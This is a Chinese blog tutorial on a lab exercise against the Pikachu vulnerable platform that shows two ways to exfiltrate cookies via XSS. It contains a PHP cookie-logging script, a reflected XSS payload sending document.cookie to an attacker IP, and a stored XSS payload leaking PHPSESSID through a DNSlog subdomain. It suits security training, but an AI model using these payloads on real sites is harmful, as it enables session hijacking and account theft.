首页 > 其他分享 >XSS漏洞利用实验——使用两种方式外带cookie

XSS漏洞利用实验——使用两种方式外带cookie

时间:2024-10-15 21:50:04浏览次数:5  
标签:XSS 外带 kali 虚拟机 apache2 cookie var

0x00 前言

关于XSS的基本知识可以查看

https://blog.csdn.net/weixin_44656518/article/details/142832967?spm=1001.2014.3001.5501

0x01 使用自建服务器外带数据(反射型XSS)

使用实验环境:kali虚拟机,pikachu漏洞实验平台

1.查看kali虚拟机ip地址

我这里是192.168.80.131
不同虚拟机配置ip会有变动

2.在kali虚拟机中启动apache2环境

//启动apache2
service apache2 start

//查看apache2状态
netstat -anpt | grep apache2

3.进入 /var/www/html 目录

cd /var/www/html

4.创建接收cookie用的文件cookie.php并在文件中写入代码

vim cookie.php

<?php
  $cookie = $_GET['cookie'];
  $log = fopen("cookie.txt","a");
    fwrite($log,$cookie."\n");
    fclose($log);
?>

5.给文件最高权限

chmod 777 /var/www/html/cookie.php

6.打开pikachu漏洞实验平台,选择反射型xss(post)

输入用户名密码登录(默认用户名密码 admin/123456)

7.编写钓鱼的提交代码

将第一步kali的ip地址填入url中

<script>window.open('http://192.168.80.131/cookie.php?cookie='+document.cookie)</script>

8.将钓鱼代码填入并点击提交

此时会弹出一个空白页面

9.回到kali虚拟机中

查看cookie.txt文件
能够看到该用户的用户名,md5加密后的密码,以及PHPSESSID

10.使用cmd5查询后可以看到密码为123456

0x02 利用DNSlog外带数据(存储型XSS)

1.打开DNSlog网站

http://dnslog.cn/

点击 Get SubDomain 获取域名

2.根据域名编写钓鱼代码

<script>
var arr=document.cookie.split(/[;=]/);
var url = "http://"+arr[3]+".710e3m.dnslog.cn";
document.write('<img src="'+url+'"/>');
</script>

3.将代码复制到pikachu漏洞练习平台的存储型xss的留言框内并提交

4.这里可以看到一个空的图片,说明钓鱼代码已经成功保存到数据库

5.回到DNSlog页面

点击刷新,可以看到下方用户的PHPSESSID数据

可以看到和浏览器内的数据是一致的

0x04 如有疑问,欢迎评论区留言,制作不易,请多多包涵 

标签:XSS,外带,kali,虚拟机,apache2,cookie,var
From: https://blog.csdn.net/weixin_44656518/article/details/142911582

相关文章

  • 【JavaWeb】一文读懂Cookie、Session&Token 的区别和联系
    大佬精心打造:JavaWeb进阶学习资料》》点击免费获取【javaWeb】Cookie&Session&SpringSession原理分析简介Cookie、Session、Token这三者是不同发展阶段的产物,都是为了解决无状态的HTTP协议,提升网站的交互体验。但是他们各有优缺点,三者也没有明显的对立关系,反而常常......
  • 【Spring】获取Cookie和Session(@CookieValue()和@SessionAttribute())
    获取Cookie传统获取Cookie这是没有Spring的时候,用Servlet来获取(获取所有的Cookie)SpringMVC是基于ServletAPI构建的原始Web框架,也是在Servlet的基础上实现的@RequestMapping("/getcookie")publicStringgetCookie(HttpServletRequestrequest, ......
  • 5.XSS-反射型(post)利用:获取cookie
    原理:文件路径:\pikachu\pkxss\xcookie\post.html将post.html文件,复制到皮卡丘的根路径下或者根下随意路径即可,并编辑文件需要修改以下两个地址,第一个地址是将原界面的样子链接过来,让用户认为是原界面,第二个是将cookie从数据库中提取出来的程序(注意和自己的目录相对应)基于域名配......
  • cookie 和 session
    1、cookie通过在客户端记录的信息确定用户身份。http是一种无连接协议,客户端和服务端交互仅限于请求/响应过程,结束后断开,下一次请求时,服务端会认为是一个新的客户端。为了维护连接,让服务端知道这是前一个用户发起的请求,必须在一个地方保存客户端信息。2、sessionsession,中文......
  • XSSer简单了解与使用
    XSSer(CrossSiteScriptingExplorer)是一款自动化的XSS漏洞检测和利用工具,可以在Web应用中发现、利用、报告XSS漏洞,包含了多种选项,可以尝试绕过某些过滤器,并使用各种特殊技术进行代码注入,它通过自动化的工作流程帮助安全人员识别潜在的安全风险,并提供详细的报告,以增强网站的安......
  • XSStrike的简单认识与使用
    XSStrike是一个用于检测XSS漏洞的工具,可以检测反射型、DOM型XSS漏洞,集成了模糊匹配、多线程爬取、WAF绕过、Payload生成、XSS盲注以及通过字典文件枚举等功能。它不像其他工具那样注入有效负载并检查其工作,而是通过多个解析器分析相应,然后通过模糊引擎集成的上下文分析来保证有......
  • electron-vite_6js-cookie失效
    我们项目是用了js-cookie,后续集成的时候发现,无法进入首页;经过排查是js-cookie无法使用,可能是electron打包后的项目运行的时候是file:///猜测原因:因为Cookie是与域名相关联的,而file:///协议没有域名,因此Cookie可能无法正常工作。file:///C:/Users/Administrator/AppData/......
  • JWT(JSON Web Token)、Token、Session和Cookie
    JWT(JSONWebToken)、Token、Session和Cookie都是Web开发中常用的概念,它们各自在不同的场景下发挥着重要的作用。以下是对这四个概念的详细解释和比较:一、JWT(JSONWebToken)定义:JWT是一个紧凑的、自包含的用于双方之间安全传输信息的JSON对象。它通过将Token划分为头部(Header......
  • playwright自动登录获取cookie/ck
    有些登录逆向起来比较麻烦,就用了自动化importtimeimportjsonimportrandomfromplaywright.sync_apiimportPlaywright,sync_playwright,expect#https://xxxx.edu.cn/appportalweb/seatspace/"""需要提前10分钟获取ck"""defrun(playwright:Playwright)......
  • 解决方案:java.lang.IllegalArgumentException: 为此cookie指定的域[localhost:xxxx]无
    转载:https://blog.csdn.net/weixin_43724845/article/details/116198741问题原因:Tomcat 8更换默认的CookieProcessor实现为Rfc6265CookieProcessor,之前的实现为LegacyCookieProcessor。前者是基于RFC6265,而后者基于RFC6265、RFC2109、RFC2616。解决方式:修改tomcat......